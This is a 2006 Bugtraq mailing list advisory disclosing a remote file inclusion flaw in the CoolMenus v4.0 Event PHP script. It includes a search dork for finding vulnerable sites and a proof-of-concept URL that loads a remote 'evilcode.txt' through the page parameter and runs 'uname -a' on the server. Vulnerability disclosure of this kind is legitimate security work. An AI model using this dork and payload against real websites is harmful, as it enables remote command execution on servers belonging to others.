Bugtraq mailing list archives
[Kurdish Security #3] CoolMenus Event Remote File Include Vulnerability (For PHP)
From: botan () linuxmail org
Date: 28 Apr 2006 17:47:06 -0000
Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/coolmenus-event-remote-file-include.html #ColMenus Event Remote File Include Vulnerability# #Website : http://coolmenus.dhtmlcentral.com/projects/coolmenus [Closed] #Script : CoolMenus v4.0 Event Script #Risk : High #Class : Remote #Greetz : B3g0k,Nistiman,Flot,Netqurd etc.. #d0rk : "/event/index.php?page=" I. require("event_inc.php"); echo "Events"; $start = filectime($news); $jetzt = time(); $update = "$start"+"$timespan"; if($jetzt >= $update) {include("event_html.php");} II. Proof of Concept: http://www.site.com/[path]/event/index.php?page=evilcode.txt?&cmd=uname -a
Current thread:
- [Kurdish Security #3] CoolMenus Event Remote File Include Vulnerability (For PHP) botan (Apr 28)